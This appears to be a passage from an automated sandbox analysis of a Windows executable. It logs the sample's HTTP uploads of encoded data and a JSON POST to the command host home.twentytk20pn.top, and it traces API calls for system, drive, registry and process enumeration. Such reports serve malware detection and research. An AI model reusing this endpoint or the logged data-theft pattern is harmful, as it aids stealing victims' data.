                                                            Dec 20, 2024 17:30:34.571782112 CET9888OUTData Raw: 58 50 4a 7a 5c 2f 72 43 47 5c 2f 6c 2b 6c 56 70 49 5c 2f 76 62 5c 2f 76 38 65 6e 2b 66 72 69 67 31 49 66 52 45 5c 2f 35 5a 5c 2f 77 43 71 5c 2f 77 41 5c 2f 5c 2f 71 39 75 4b 59 41 37 66 64 54 7a 44 39 53 50 31 71 66 61 5c 2f 77 44 75 63 5c 2f 36
                                                            Data Ascii: XPJz\/rCG\/l+lVpI\/vb\/v8en+frig1IfRE\/5Z\/wCq\/wA\/\/q9uKYA7fdTzD9SP1qfa\/wDuc\/6v\/lv09s9ag8t\/k\/jx\/kfp9P1zQdAeWn8aRp\/y17ifpVNl+b\/Y\/wCmn7i3\/wC3Tt1\/+vVzb+7+f85P5\/n\/ACx1FQ7Y\/n\/j8v8Ae9zQdlPr8isWO3Z9f8\/hx\/k0yVv3e9\/+\/n+enOP8Km\/1n8
                                                            Dec 20, 2024 17:30:34.691277981 CET2472OUTData Raw: 66 34 48 78 5c 2f 50 6a 5c 2f 77 43 74 6e 38 76 78 71 48 5c 2f 62 5c 2f 77 43 57 66 5c 2f 31 5c 2f 7a 36 63 66 58 6a 72 51 64 68 44 39 35 66 6e 39 4f 6b 66 50 2b 66 62 38 65 4b 68 62 2b 35 74 2b 6d 66 35 5c 2f 35 50 31 37 31 63 6b 54 35 55 2b 54
                                                            Data Ascii: f4Hx\/Pj\/wCtn8vxqH\/b\/wCWf\/1\/z6cfXjrQdhD95fn9OkfP+fb8eKhb+5t+mf5\/5P171ckT5U+T\/v3n+np9f\/rwxhPnf+P\/AJa\/5\/z+tBVLp\/h\/yIfL\/wCmNRSfnx5v+t61LIf9jZ\/10l\/Xp\/nHSmf3E2x89e3k\/Sg7iGTZ8j\/cfP8Az14\/yO3b8KZ8\/wB9E3\/9O\/4D8z\/TinD7kf8A7U\/4+P
                                                            Dec 20, 2024 17:30:34.691381931 CET4944OUTData Raw: 2b 69 33 64 53 37 6b 2b 35 73 47 50 4e 5c 2f 77 43 58 65 4c 79 50 38 35 71 47 4f 52 38 66 33 45 6a 5c 2f 41 4e 56 2b 2b 75 76 5c 2f 41 41 46 5c 2f 58 4a 6f 2b 50 79 74 38 39 5c 2f 75 37 47 6c 50 72 38 76 31 43 54 39 35 73 33 76 73 38 79 4b 33 38
                                                            Data Ascii: +i3dS7k+5sGPN\/wCXeLyP85qGOR8f3Ej\/ANV++uv\/AAF\/XJo+Pyt89\/u7GlPr8v1CT95s3vs8yK3839z+n+Pfj8aGkdMJ\/H\/qhJ5vn\/56fhT5P9Ynk\/8APK3l+0ebj9f\/AK9QybPmd08n975X7z\/Pf654rM0GbvL3uEG\/zR+7\/wCe30\/l\/nk2vJ86eZv5k\/1p\/fe9paCnrlWREfe\/+t8ySX\/POM1EW5+
                                                            Dec 20, 2024 17:30:34.691421986 CET7416OUTData Raw: 2f 77 44 46 42 58 35 63 5c 2f 74 73 5c 2f 74 59 48 39 73 58 34 71 36 42 38 54 6a 34 46 48 77 34 62 51 5c 2f 68 5c 2f 70 58 67 51 61 45 50 45 5c 2f 5c 2f 43 58 43 35 54 53 5c 2f 45 58 69 6e 78 41 4e 56 4f 71 5c 2f 38 49 39 34 5a 4d 62 58 44 2b 4b
                                                            Data Ascii: /wDFBX5c\/ts\/tYH9sX4q6B8Tj4FHw4bQ\/h\/pXgQaEPE\/\/CXC5TS\/EXinxANVOq\/8I94ZMbXD+KJLQ2P9muIVsUn+2TG5MNv8peJfD2ueHPEfhnwnBP4W8XeIvEnxsuP2b59J8Ga9fX954N+PFpoXg\/xDd\/C\/x8Nb8P8Ah238P+ILWx8YxrLdWtxq\/h95vDfjMW2tTx+FtUlhq6bb+F9e8JeGPEugfGv4D6\/rHx
                                                            Dec 20, 2024 17:30:34.736499071 CET27192OUTData Raw: 59 7a 63 6b 61 75 6e 33 33 38 72 39 31 48 48 2b 76 38 41 53 71 32 32 52 46 33 37 50 6e 5c 2f 36 5a 5c 2f 75 50 38 39 75 35 78 55 30 6d 79 52 76 4a 5c 2f 6a 4d 58 2b 66 38 41 4a 36 55 4d 79 66 75 58 32 52 70 35 63 58 37 33 5c 2f 6a 36 39 5c 2f 77
                                                            Data Ascii: Yzckaun338r91HH+v8ASq22RF37Pn\/6Z\/uP89u5xU0myRvJ\/jMX+f8AJ6UMyfuX2Rp5cX73\/j69\/wDP\/wCqg1CSP5XeOH5P9b5cn+v+z\/8ALoM\/mPyqF\/l2bP8Alp+6l68\/9PX19P8ACj5Cv3NkPleVFJHL\/qf9L5\/zn1qb98EhT773Hf8A569\/8\/40AMjk2tHsTzX\/AOefXr\/n65qFd8cbu\/z9PN\/ddP
                                                            Dec 20, 2024 17:30:34.856455088 CET7416OUTData Raw: 43 66 70 2b 46 4a 75 32 79 59 66 72 5c 2f 71 76 33 6b 58 42 5c 2f 6c 5c 2f 6e 76 69 6f 6c 58 7a 50 6e 2b 34 4f 5c 2f 6d 66 54 4e 41 42 6e 62 76 54 37 37 78 5c 2f 38 39 50 33 5c 2f 41 50 31 39 34 39 66 70 33 70 6d 50 34 48 65 56 45 38 30 53 79 5c
                                                            Data Ascii: Cfp+FJu2yYfr\/qv3kXB\/l\/nviolXzPn+4O\/mfTNABnbvT77x\/89P3\/AP1949fp3pmP4HeVE80Sy\/vf3\/r+fSnyb93nbMJzL3\/T6f5FNmjhaHf\/AMtvNzF3\/wCPzH1rnOyn1+X6lVo32\/fiSGOLzfN8r+f+fT8G\/Pt\/8i\/vf\/rdP89ealEblkR\/uf6r8v8AOf6VFIXVk85P+mXmc\/55\/wAitqXT\/F\/k
                                                            Dec 20, 2024 17:30:35.022742033 CET1236OUTData Raw: 47 51 63 66 63 59 35 4a 6c 57 46 64 53 72 57 65 47 79 33 4b 75 49 63 78 77 4f 42 6f 4f 74 57 6e 55 72 56 58 52 77 74 43 6c 54 39 70 56 71 54 71 31 4f 58 6d 71 54 6c 4e 74 75 76 52 56 69 6f 6d 58 48 49 36 66 79 72 37 51 2b 48 39 72 35 79 5c 2f 72
                                                            Data Ascii: GQcfcY5JlWFdSrWeGy3KuIcxwOBoOtWnUrVXRwtClT9pVqTq1OXmqTlNtuvRViomXHI6fyr7Q+H9r5y\/r5kOwe\/8An8KbtH94f5\/GpaZsHv8A5\/Cgoiop0i5\/H+n+RUfz\/wCz+tB0ENFSeX7\/AKf\/AF6jrT2fn+H\/AAQCo\/L9\/wBP\/r1JTH6fj\/jT5F5\/18jXnXn\/AF8yKiiirLIn6\/h\/U0ypZOifQ\/zq
                                                            Dec 20, 2024 17:30:35.905395031 CET212INHTTP/1.0 503 Service Unavailable
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.1149728147.45.113.159807772C:\Users\user\Desktop\Tsy9P2T9yF.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 20, 2024 17:30:37.297437906 CET287OUTPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                            Host: home.twentytk20pn.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 143
                                                            Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                            Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                            Dec 20, 2024 17:30:38.778016090 CET212INHTTP/1.0 503 Service Unavailable
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.114971534.226.108.1554437772C:\Users\user\Desktop\Tsy9P2T9yF.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-20 16:30:32 UTC52OUTGET /ip HTTP/1.1
                                                            Host: httpbin.org
                                                            Accept: */*
                                                            2024-12-20 16:30:32 UTC224INHTTP/1.1 200 OK
                                                            Date: Fri, 20 Dec 2024 16:30:32 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 31
                                                            Connection: close
                                                            Server: gunicorn/19.9.0
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Credentials: true
                                                            2024-12-20 16:30:32 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                            Data Ascii: { "origin": "8.46.123.189"}


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:11:30:27
                                                            Start date:20/12/2024
                                                            Path:C:\Users\user\Desktop\Tsy9P2T9yF.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Tsy9P2T9yF.exe"
                                                            Imagebase:0x4b0000
                                                            File size:4'448'768 bytes
                                                            MD5 hash:03AE071235D37EDC3EA30848462BCCBC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:3.4%
                                                              Dynamic/Decrypted Code Coverage:27.6%
                                                              Signature Coverage:16.1%
                                                              Total number of Nodes:490
                                                              Total number of Limit Nodes:65
                                                              execution_graph 81842 4b13c9 81846 4b1160 81842->81846 81845 4b13a1 81846->81845 81847 8393e0 81846->81847 81857 838a20 10 API calls 81846->81857 81853 839400 81847->81853 81856 8393f3 81847->81856 81848 839688 81849 8396c7 81848->81849 81848->81856 81858 839280 vfprintf 81848->81858 81859 839220 vfprintf 81849->81859 81852 8396df 81852->81846 81853->81848 81853->81849 81854 839220 vfprintf 81853->81854 81855 839280 vfprintf 81853->81855 81853->81856 81854->81853 81855->81853 81856->81846 81857->81846 81858->81848 81859->81852 82225 83b160 Sleep 82226 4cd5e0 82227 4cd652 WSAStartup 82226->82227 82228 4cd5f0 82226->82228 82227->82228 81860 4eb400 81861 4eb40b 81860->81861 81862 4eb425 81860->81862 81865 4b7770 81861->81865 81863 4eb421 81866 4b7790 81865->81866 81867 4b77b6 recv 81865->81867 81866->81867 81868 4b7799 81866->81868 81867->81868 81868->81863 81869 4ee400 81870 4ee412 81869->81870 81871 4ee459 81869->81871 81873 4e68b0 socket ioctlsocket connect getsockname closesocket 81870->81873 81873->81871 81874 4eb3c0 81875 4eb3ee 81874->81875 81876 4eb3cb 81874->81876 81880 4e9290 81876->81880 81887 4b76a0 81876->81887 81877 4eb3ea 81881 4b76a0 send 81880->81881 81883 4e92e5 81881->81883 81882 4e9392 81882->81877 81883->81882 81884 4e9335 WSAIoctl 81883->81884 81884->81882 81885 4e9366 81884->81885 81885->81882 81886 4e9371 setsockopt 81885->81886 81886->81882 81888 4b76c0 81887->81888 81889 4b76e6 send 81887->81889 81888->81889 81890 4b76c9 81888->81890 81889->81890 81890->81877 82229 4b29ff FindFirstFileA 82230 4b2a31 82229->82230 82231 4b2a5c RegOpenKeyExA 82230->82231 82232 4b2a93 82231->82232 82233 4b2ade CharUpperA 82232->82233 82235 4b2b0a 82233->82235 82234 4b2bf9 QueryFullProcessImageNameA 82236 4b2c3b CloseHandle 82234->82236 82235->82234 82237 4b2c64 82236->82237 82238 4b2df1 CloseHandle 82237->82238 82239 4b2e23 82238->82239 81891 718030d 81892 71802fc 81891->81892 81893 7180403 Process32FirstW 81892->81893 81894 718041f 81893->81894 81895 4b3d5e 81900 4b3d30 81895->81900 81896 4b3d90 81904 4bfcb0 10 API calls 81896->81904 81899 4b3dc1 81900->81895 81900->81896 81901 4c0ab0 81900->81901 81905 4c05b0 81901->81905 81903 4c0acd 81903->81900 81904->81899 81906 4c05bd 81905->81906 81908 4c07c7 81905->81908 81907 4c0707 WSAEventSelect 81906->81907 81906->81908 81909 4c07ef 81906->81909 81911 4b76a0 send 81906->81911 81907->81906 81907->81908 81908->81903 81909->81908 81913 4c0847 81909->81913 81915 4c6fa0 81909->81915 81911->81906 81912 4c09e8 WSAEnumNetworkEvents 81912->81913 81914 4c09d0 WSAEventSelect 81912->81914 81913->81908 81913->81912 81913->81914 81914->81912 81914->81913 81916 4c6feb 81915->81916 81917 4c6fd4 81915->81917 81916->81913 81917->81916 81918 4c7207 select 81917->81918 81918->81916 81922 4c7233 81918->81922 81919 4c726b __WSAFDIsSet 81920 4c729a __WSAFDIsSet 81919->81920 81919->81922 81921 4c72ba __WSAFDIsSet 81920->81921 81920->81922 81921->81922 81922->81916 81922->81919 81922->81920 81922->81921 82240 4c1139 82241 4c1148 82240->82241 82243 4c1527 82241->82243 82246 4c0f69 82241->82246 82248 4bfec0 10 API calls 82241->82248 82243->82246 82249 4c22d0 10 API calls 82243->82249 82245 4c0f00 82246->82245 82250 4ed4d0 socket ioctlsocket connect getsockname closesocket 82246->82250 82248->82243 82249->82246 82250->82245 81923 4b255d 81967 839f70 81923->81967 81925 4b256c GetSystemInfo 81926 4b2589 81925->81926 81927 4b25a0 GlobalMemoryStatusEx 81926->81927 81928 4b25ec 81927->81928 81933 4b261b 81928->81933 81969 71402a9 81928->81969 81973 71400ac 81928->81973 81981 71401a8 81928->81981 81985 7140266 81928->81985 81989 71400a3 81928->81989 81997 71402f6 81928->81997 82001 714007c 81928->82001 82009 7140109 81928->82009 82017 71400f5 81928->82017 82025 7140042 81928->82025 82033 7140008 81928->82033 82041 7140240 81928->82041 82045 7140000 81928->82045 82053 7140186 81928->82053 82057 7140207 81928->82057 82061 71401c5 81928->82061 82065 7140146 81928->82065 82069 7140304 81928->82069 82073 7140284 81928->82073 82077 714001a 81928->82077 82085 714019b 81928->82085 82089 7140058 81928->82089 82097 7140219 81928->82097 82101 7140350 81928->82101 82105 7140152 81928->82105 82113 7140257 81928->82113 82117 71402d7 81928->82117 82121 7140296 81928->82121 82125 71401d6 81928->82125 81929 4b263c GetDriveTypeA 81931 4b2655 GetDiskFreeSpaceExA 81929->81931 81929->81933 81930 4b2762 81932 4b27d6 KiUserCallbackDispatcher 81930->81932 81931->81933 81934 4b27f8 81932->81934 81933->81929 81933->81930 81935 4b28d9 FindFirstFileW 81934->81935 81936 4b2906 FindNextFileW 81935->81936 81937 4b2928 81935->81937 81936->81936 81936->81937 81968 839f7d 81967->81968 81968->81925 81968->81968 81970 71402b5 GetLogicalDrives 81969->81970 81972 714033d 81970->81972 81974 71400b4 81973->81974 81975 7140116 81974->81975 81978 7140159 GetLogicalDrives 81974->81978 81976 7140137 81975->81976 81977 7140146 GetLogicalDrives 81975->81977 81977->81976 81980 714033d 81978->81980 81982 71401cd GetLogicalDrives 81981->81982 81984 714033d 81982->81984 81986 7140233 GetLogicalDrives 81985->81986 81988 714033d 81986->81988 81990 71400a6 81989->81990 81991 7140116 81990->81991 81994 7140159 GetLogicalDrives 81990->81994 81992 7140137 81991->81992 81993 7140146 GetLogicalDrives 81991->81993 81993->81992 81996 714033d 81994->81996 81998 71402fc GetLogicalDrives 81997->81998 82000 714033d 81998->82000 82002 7140080 82001->82002 82003 7140116 82002->82003 82006 7140159 GetLogicalDrives 82002->82006 82004 7140137 82003->82004 82005 7140146 GetLogicalDrives 82003->82005 82005->82004 82008 714033d 82006->82008 82010 71400e9 82009->82010 82011 7140116 82010->82011 82014 7140159 GetLogicalDrives 82010->82014 82012 7140137 82011->82012 82013 7140146 GetLogicalDrives 82011->82013 82013->82012 82016 714033d 82014->82016 82018 71400e9 82017->82018 82019 7140116 82018->82019 82022 7140159 GetLogicalDrives 82018->82022 82020 7140137 82019->82020 82021 7140146 GetLogicalDrives 82019->82021 82021->82020 82024 714033d 82022->82024 82026 7140047 82025->82026 82027 7140116 82026->82027 82030 7140159 GetLogicalDrives 82026->82030 82028 7140137 82027->82028 82029 7140146 GetLogicalDrives 82027->82029 82029->82028 82032 714033d 82030->82032 82034 7140014 82033->82034 82035 7140116 82034->82035 82038 7140159 GetLogicalDrives 82034->82038 82036 7140137 82035->82036 82037 7140146 GetLogicalDrives 82035->82037 82037->82036 82040 714033d 82038->82040 82042 71401e4 GetLogicalDrives 82041->82042 82044 714033d 82042->82044 82046 7140014 82045->82046 82047 7140116 82046->82047 82050 7140159 GetLogicalDrives 82046->82050 82048 7140137 82047->82048 82049 7140146 GetLogicalDrives 82047->82049 82049->82048 82052 714033d 82050->82052 82054 71401a2 GetLogicalDrives 82053->82054 82056 714033d 82054->82056 82058 714020d GetLogicalDrives 82057->82058 82060 714033d 82058->82060 82062 71401cd GetLogicalDrives 82061->82062 82064 714033d 82062->82064 82066 7140158 GetLogicalDrives 82065->82066 82068 714033d 82066->82068 82070 714031a GetLogicalDrives 82069->82070 82072 714033d 82070->82072 82074 714028d GetLogicalDrives 82073->82074 82076 714033d 82074->82076 82078 7140048 82077->82078 82079 7140116 82078->82079 82082 7140159 GetLogicalDrives 82078->82082 82080 7140137 82079->82080 82081 7140146 GetLogicalDrives 82079->82081 82081->82080 82084 714033d 82082->82084 82086 71401a2 GetLogicalDrives 82085->82086 82088 714033d 82086->82088 82090 7140047 82089->82090 82091 7140116 82090->82091 82094 7140159 GetLogicalDrives 82090->82094 82092 7140137 82091->82092 82093 7140146 GetLogicalDrives 82091->82093 82093->82092 82096 714033d 82094->82096 82098 71401c3 GetLogicalDrives 82097->82098 82100 714033d 82098->82100 82102 71402e5 GetLogicalDrives 82101->82102 82104 714033d 82101->82104 82102->82104 82106 7140113 82105->82106 82110 7140155 GetLogicalDrives 82105->82110 82107 7140116 82106->82107 82106->82110 82108 7140137 82107->82108 82109 7140146 GetLogicalDrives 82107->82109 82109->82108 82112 714033d 82110->82112 82114 714027a GetLogicalDrives 82113->82114 82116 714033d 82114->82116 82118 71402db GetLogicalDrives 82117->82118 82120 714033d 82118->82120 82122 71402a3 GetLogicalDrives 82121->82122 82124 714033d 82122->82124 82126 714020f GetLogicalDrives 82125->82126 82128 714033d 82126->82128 82129 563c00 82130 563c23 82129->82130 82132 563c0d 82129->82132 82130->82132 82133 57b180 82130->82133 82134 57b19b 82133->82134 82136 57b2e3 82133->82136 82134->82136 82138 57b2a9 getsockname 82134->82138 82140 57b020 closesocket 82134->82140 82141 57af30 82134->82141 82145 57b060 82134->82145 82136->82132 82150 57b020 82138->82150 82140->82134 82142 57af63 socket 82141->82142 82143 57af4c 82141->82143 82142->82134 82143->82142 82144 57af52 82143->82144 82144->82134 82149 57b080 82145->82149 82146 57b0b0 connect 82147 57b0bf WSAGetLastError 82146->82147 82148 57b0ea 82147->82148 82147->82149 82148->82134 82149->82146 82149->82147 82149->82148 82151 57b052 82150->82151 82152 57b029 82150->82152 82151->82134 82153 57b04b closesocket 82152->82153 82154 57b03e 82152->82154 82153->82151 82154->82134 82251 564720 82255 564728 82251->82255 82252 564733 82254 564774 82255->82252 82262 56476c 82255->82262 82263 565540 socket ioctlsocket connect getsockname closesocket 82255->82263 82257 56482e 82257->82262 82264 569270 82257->82264 82259 564860 82269 564950 82259->82269 82261 564878 82262->82261 82275 5630a0 socket ioctlsocket connect getsockname closesocket 82262->82275 82263->82257 82276 56a440 82264->82276 82266 569297 82268 5692ab 82266->82268 82310 56bbe0 socket ioctlsocket connect getsockname closesocket 82266->82310 82268->82259 82270 564966 82269->82270 82272 5649c5 82270->82272 82274 5649b9 82270->82274 82311 56bbe0 socket ioctlsocket connect getsockname closesocket 82270->82311 82271 564aa0 gethostname 82271->82272 82271->82274 82272->82262 82274->82271 82274->82272 82275->82254 82277 56a46b 82276->82277 82279 56a48b GetAdaptersAddresses 82277->82279 82306 56a4db 82277->82306 82278 56aa03 RegOpenKeyExA 82280 56aa27 RegQueryValueExA 82278->82280 82281 56ab70 RegOpenKeyExA 82278->82281 82296 56a4a6 82279->82296 82279->82306 82282 56aa71 82280->82282 82283 56aacc RegQueryValueExA 82280->82283 82284 56ac34 RegOpenKeyExA 82281->82284 82305 56ab90 82281->82305 82282->82283 82292 56aa85 RegQueryValueExA 82282->82292 82285 56ab66 RegCloseKey 82283->82285 82286 56ab0e 82283->82286 82287 56acf8 RegOpenKeyExA 82284->82287 82308 56ac54 82284->82308 82285->82281 82286->82285 82297 56ab1e RegQueryValueExA 82286->82297 82289 56ad56 RegEnumKeyExA 82287->82289 82293 56ad14 82287->82293 82288 56a4f3 GetAdaptersAddresses 82290 56a505 82288->82290 82288->82306 82291 56ad9b 82289->82291 82289->82293 82300 56a527 GetAdaptersAddresses 82290->82300 82290->82306 82294 56ae16 RegOpenKeyExA 82291->82294 82295 56aab3 82292->82295 82293->82266 82298 56ae34 RegQueryValueExA 82294->82298 82299 56addf RegEnumKeyExA 82294->82299 82295->82283 82296->82288 82296->82306 82303 56ab4c 82297->82303 82301 56af43 RegQueryValueExA 82298->82301 82309 56adaa 82298->82309 82299->82293 82299->82294 82300->82306 82302 56b052 RegQueryValueExA 82301->82302 82301->82309 82304 56adc7 RegCloseKey 82302->82304 82302->82309 82303->82285 82304->82299 82305->82284 82306->82278 82306->82293 82307 56afa0 RegQueryValueExA 82307->82309 82308->82287 82309->82301 82309->82302 82309->82304 82309->82307 82310->82268 82311->82274 82155 57a080 82158 579740 82155->82158 82157 57a09b 82159 579780 82158->82159 82163 57975d 82158->82163 82160 579925 RegOpenKeyExA 82159->82160 82159->82163 82161 57995a RegQueryValueExA 82160->82161 82160->82163 82162 579986 RegCloseKey 82161->82162 82162->82163 82163->82157 82312 4bf7b0 82313 4bf97a 82312->82313 82316 4bf7c3 82312->82316 82314 4bf932 82320 4ecd80 82314->82320 82316->82313 82316->82314 82335 4bfec0 10 API calls 82316->82335 82318 4bf942 82319 4bf9bb WSACloseEvent 82318->82319 82319->82313 82321 4ed0e5 82320->82321 82326 4ecd9a 82320->82326 82321->82318 82322 4ed0b4 82341 4cf6c0 10 API calls 82322->82341 82326->82321 82331 4ece6b 82326->82331 82336 4edc30 socket ioctlsocket connect getsockname closesocket 82326->82336 82327 4ed064 82327->82322 82340 4ede00 socket ioctlsocket connect getsockname closesocket 82327->82340 82329 4ecf4b 82332 4ed016 82329->82332 82334 4c6fa0 4 API calls 82329->82334 82338 4ee130 socket ioctlsocket connect getsockname closesocket 82329->82338 82331->82327 82331->82329 82337 4edc30 socket ioctlsocket connect getsockname closesocket 82331->82337 82332->82327 82339 4ede00 socket ioctlsocket connect getsockname closesocket 82332->82339 82334->82329 82335->82316 82336->82326 82337->82331 82338->82329 82339->82332 82340->82327 82341->82321 82164 4b2f17 82171 4b2f2c 82164->82171 82165 4b31d3 82166 4b2fb3 RegOpenKeyExA 82166->82171 82167 4b315c RegEnumKeyExA 82167->82171 82168 4b3046 RegOpenKeyExA 82169 4b3089 RegQueryValueExA 82168->82169 82168->82171 82170 4b313b RegCloseKey 82169->82170 82169->82171 82170->82171 82171->82165 82171->82166 82171->82167 82171->82168 82171->82170 82172 4b31d7 82175 4b31f4 82172->82175 82173 4b3200 82174 4b32dc CloseHandle 82174->82173 82175->82173 82175->82174 82176 4e8b50 82177 4e8b6b 82176->82177 82194 4e8bb5 82176->82194 82178 4e8b8f 82177->82178 82179 4e8bf3 82177->82179 82177->82194 82215 4c6e40 select __WSAFDIsSet __WSAFDIsSet __WSAFDIsSet 82178->82215 82196 4ea550 82179->82196 82182 4e8bfc 82185 4e8c1f connect 82182->82185 82186 4e8c35 82182->82186 82193 4e8cb2 82182->82193 82182->82194 82183 4e8cd9 SleepEx getsockopt 82187 4e8d18 82183->82187 82184 4ea150 getsockname 82192 4e8dff 82184->82192 82185->82186 82211 4ea150 82186->82211 82188 4e8d43 82187->82188 82187->82193 82191 4ea150 getsockname 82188->82191 82191->82194 82192->82194 82216 4b78b0 closesocket 82192->82216 82193->82184 82193->82192 82193->82194 82195 4e8ba1 82195->82183 82195->82193 82195->82194 82197 4ea575 82196->82197 82201 4ea597 82197->82201 82218 4b75e0 82197->82218 82199 4b78b0 closesocket 82200 4ea713 82199->82200 82200->82182 82202 4ea811 setsockopt 82201->82202 82207 4ea83b 82201->82207 82209 4ea69b 82201->82209 82202->82207 82204 4eaf56 82205 4eaf5d 82204->82205 82204->82209 82205->82200 82206 4ea150 getsockname 82205->82206 82206->82200 82207->82209 82210 4eabe1 82207->82210 82224 4e6be0 13 API calls 82207->82224 82209->82199 82209->82200 82210->82209 82223 5167e0 ioctlsocket 82210->82223 82212 4ea15f 82211->82212 82214 4ea1d0 82211->82214 82213 4ea181 getsockname 82212->82213 82212->82214 82213->82214 82214->82195 82215->82195 82217 4b78c5 82216->82217 82217->82194 82219 4b75ef 82218->82219 82220 4b7607 socket 82218->82220 82219->82220 82222 4b7643 82219->82222 82221 4b762b 82220->82221 82221->82201 82222->82201 82223->82204 82224->82210 82342 4e95b0 82343 4e95c8 82342->82343 82344 4e95fd 82342->82344 82343->82344 82345 4ea150 getsockname 82343->82345 82345->82344 82346 8ed270 82348 8ed29a 82346->82348 82347 8ed2a6 82348->82347 82351 8412a0 82348->82351 82350 8ed2da 82352 8412ac 82351->82352 82355 83e030 82352->82355 82354 8412da 82354->82350 82357 83e07d 82355->82357 82390 83e4e3 82355->82390 82356 83e186 82356->82354 82357->82356 82358 83e368 82357->82358 82359 83e223 82357->82359 82360 83df40 fgetc 82357->82360 82361 83e16e 82357->82361 82357->82390 82358->82356 82366 83eb32 82358->82366 82375 83e699 82358->82375 82358->82390 82391 840098 ungetc 82358->82391 82396 83df40 fgetc 82358->82396 82359->82356 82384 83e24f 82359->82384 82392 83df40 fgetc 82359->82392 82360->82357 82361->82356 82364 83ed70 ungetc 82361->82364 82364->82356 82365 840230 ungetc 82365->82390 82368 83eb43 82366->82368 82369 83e7fa 82366->82369 82367 841184 ungetc 82367->82390 82370 83f0b5 82368->82370 82386 83eb5a 82368->82386 82377 83e830 82369->82377 82369->82386 82397 83df40 fgetc 82370->82397 82374 840722 ungetc 82374->82356 82382 83e6c4 82375->82382 82375->82386 82375->82390 82376 8408b7 ungetc 82376->82390 82377->82356 82394 83df40 fgetc 82377->82394 82381 83f0c8 82381->82356 82381->82390 82398 83df40 fgetc 82381->82398 82382->82356 82393 83df40 fgetc 82382->82393 82384->82356 82384->82374 82385 83ffe6 ungetc 82385->82390 82386->82356 82386->82390 82395 83df40 fgetc 82386->82395 82387 83fec7 82399 83dfd0 ungetc 82387->82399 82388 840e1e ungetc 82388->82390 82389 83df40 fgetc 82389->82390 82390->82356 82390->82365 82390->82367 82390->82376 82390->82384 82390->82385 82390->82387 82390->82388 82390->82389 82400 83dfd0 ungetc 82390->82400 82391->82358 82392->82359 82393->82390 82394->82390 82395->82390 82396->82358 82397->82381 82398->82381 82399->82356 82400->82390 82401 4e6ab0 82402 4e6ad5 82401->82402 82403 4e6bb4 82402->82403 82405 4c6fa0 4 API calls 82402->82405 82404 565ed0 9 API calls 82403->82404 82406 4e6ba9 82404->82406 82407 4e6b54 82405->82407 82407->82403 82407->82406 82408 4e6b5d 82407->82408 82408->82406 82410 565ed0 82408->82410 82413 565a50 82410->82413 82412 565ee5 82412->82408 82414 565a58 82413->82414 82419 565ea0 82413->82419 82415 565b50 82414->82415 82417 565b88 82414->82417 82429 565a99 82414->82429 82415->82417 82420 565eb4 82415->82420 82421 565b7a 82415->82421 82416 565e96 82448 579480 socket ioctlsocket connect getsockname closesocket 82416->82448 82426 565cae 82417->82426 82446 565ef0 socket ioctlsocket connect getsockname 82417->82446 82419->82412 82449 566f10 socket ioctlsocket connect getsockname closesocket 82420->82449 82438 5670a0 82421->82438 82425 565ec2 82425->82425 82426->82416 82428 565da1 __WSAFDIsSet 82426->82428 82434 57a920 82426->82434 82447 579320 socket ioctlsocket connect getsockname closesocket 82426->82447 82427 565be2 __WSAFDIsSet 82427->82429 82428->82426 82429->82417 82429->82427 82431 5670a0 6 API calls 